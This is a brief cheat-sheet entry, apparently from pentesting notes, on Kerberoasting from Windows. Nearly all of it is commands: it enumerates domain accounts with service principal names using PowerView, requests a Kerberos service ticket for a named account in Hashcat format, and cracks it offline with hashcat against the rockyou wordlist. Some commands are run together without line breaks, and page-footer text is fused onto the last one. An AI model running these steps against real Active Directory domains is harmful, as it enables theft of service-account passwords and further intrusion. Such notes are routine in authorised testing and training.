Kerberoasting from windows
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname
samaccountname
--------------
backupagentGet-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
$ cat hash.txt | sed 's/ //g' | tr -d \\nhashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txtLast updated